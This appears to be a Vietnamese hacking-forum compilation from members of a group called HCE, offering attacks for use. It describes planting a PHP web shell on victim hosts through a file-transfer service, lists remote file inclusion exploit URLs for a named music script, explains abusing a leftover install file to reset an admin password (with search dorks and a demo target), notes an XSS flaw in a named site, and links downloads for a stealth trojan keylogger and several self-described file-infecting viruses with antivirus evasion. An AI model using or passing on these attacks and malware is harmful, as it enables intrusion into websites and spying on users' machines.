How to: Mọi người kiếm con shell up lên chỗ rapidshare sau đó copy cái link lại, tìm cái site nào có dùng rapidleech paste cái link rapidshare ở trên vào chỗ download để transfer về host
Trang 1How to:
Mọi người kiếm con shell up lên chỗ rapidshare sau đó copy cái link lại, tìm cái site nào có dùng rapidleech paste cái link rapidshare ở trên vào chỗ download để transfer về host của tụi nó Xong phim, có shell trên host tụi nó
Thực ra ở đây ko nhất thiết là phải up shell lên rapidshare, ví dụ mọi người muốn transfer shell php về host victim thì kiếm cái host asp (ko support php) up con shell php lên rùi transfer thoải mái
Nhiều khi thằng victim nó cẩn thận nó check file type, cứ gặp file php là nó tự động del thì vẫn có cách để chơi nó , mọi người tìm hiểu thêm
Longnhi(HCE)
Source music nguoiquangnam.de
Remote file inclusion Vulnerability
By longnhi - HCEGroup.net
music_includes/new_songs.php
Code:
music_includes/new_songs.php?music_include_dir=
music_includes/search.php
Code:
music_includes/search.php?code=hack&type=song&music_include_dir=
music_includes/search.php?code=hack&type=singer&music_include_dir=
music_includes/search.php?code=hack&type=extension&music_include_dir=
file_includes/search_member.php
Code:
file_includes/search_member.php?type=theoten&music_include_dir=
file_includes/search_member.php?type=tenthat&music_include_dir=
file_includes/search_member.php?type=nickyahoo&music_include_dir=
Trang 2By longnhi - HCEGroup.net
File bị lỗi
/music_includes/new_songs.php
Code:
Đoạn code bị lỗi
include("$music_include_dir/thongbao.php");
Khai thác
/music_includes/new_songs.php?music_include_dir=
/music_includes/search.php
Code:
/search.php?os=hack&type=hack&music_include_dir=
/search.php?type=song&music_include_dir=
/search.php?type=singer&music_include_dir=
/search.php?type=extension&music_include_dir=
Uploadscript, v2.72
script name: Uploadscript v2.72
script's homepage:
_http://www.coder-world.de/cw/seite pagewebdesignupload.html
cái uploader này hôm bữa đi check tự nhiên thấy ! cái script này thằng coder nó viết nhưng mà nó quên 1 phần là không check cái file install còn xuất hiện hay không ! do dó khi mà instal xong thì victim nó sẽ không xóa file này ! mình có thể lợi dụng chỗ này mà re-install lại -> reset pass admin -> chui vào acp !
Trang 3search google:
http://www.google.com/search?hl=en&q oogle+S earch
http://www.google.com/search?q=Uploa arch&hl=en&lr=
demo: http://blackfilez.com/install.cgi
black_hat_cr(HCE)
ZMedia All version
Ai có mặt bên Free Code chắc cũng biết cái source
Nó đang nổi đình đám bên đó
Lần trước check thử thì thấy lỗi tùm lum , ku Admin chơi dùng Java để lấp liếm lại Bữa nay lên chẹck bản mới nhất cũng thấy còn 1 lỗi tuy không nặng nhưng vẫn xài được
Cái này là XSS nhá :
Trích:
VTYPMOD=2; VSPELL=1; VONOFF=1;
PHPSESSID=057ff26cbe5aca1909facf67ebbfbd9d
http://vietnam-network.net/media/index.php
No Face(HCE)
[Trojan]Spynet
Với spynet thì phần mềm gián điệp này hoạt động rất hiệu quả , đặc biệt trong môi trường Xp , bạn hãy thữ test , sau khi setup , thường thì keylogger sẽ nằm gọn trong systems32 nhưng spynet thì ko ? có mà pro mới search đc ~ nó có chức năng
Trang 4invisible tuyệt vời ~ các bạn down về dùng thử nhé
http://www.securityfocus.com/data/tools/spynet312.exe
Jps 7.0
http://www.freewebtown.com/giothoi/jps1.7.zip
cách dùng tượng tự magic
YeuEmDaiKho(HCE)
16 Hard Virus Found
Monad.Candela-family
- Very first Monad viruses
- Infects Command Shell Files for Mcft Windows Vista (Codename: Longhorn)
- Overwriter
- Prepender
- Appender
- EPO-infector
- Cross-Infector
*http://spth.host.sk/monad.zip
SPTH-OS 2.0
- Very first Bootsectorvirus for CD-ROMs
- Works on CD-ROMs and diskettes
- Own FAT32 system support (no INT hooking)
- FAT12 IMG files infection
- ISO-9660 El Torito ISO file infection
- Infects all files in Root_Directory of 1st Partition on HD
Trang 5- Size: 3 Sector
*http://spth.host.sk/spthos2.0.zip
SPTH-OS 1.0
- Bootsectorvirus
- Own FAT12 system support (no INT hooking)
- Bootsectorinfection of FAT12 IMG files
- Infects all files in Root_Directory of current Disk
- Size: 1 Sector
*http://spth.host.sk/spthos1.0.zip
Ruby.Paradoxon
- World's very first Ruby virus
- Prepender
- 655 bytes
*http://spth.host.sk/Ruby.Paradoxon.zip
Menuet/COM.Tristesse
- Multi-platform infector
- Menuet (32bit) -> Menuet (32bit - prepending)
- Menuet (32bit) -> COM (16bit - appending)
- COM (16bit) -> COM (16bit - appending)
- COM (16bit) -> Menuet (32bit - prepending)
- Fully 16/32bit assembler written
- KAV warning avoiding via by-hand DOS function encryption
*http://spth.host.sk/Menuet.Tristesse.zip
Menuet.Oxymoron
- World's very first Menuet virus
- Prepender
Trang 6- Fully 32 bit assembler written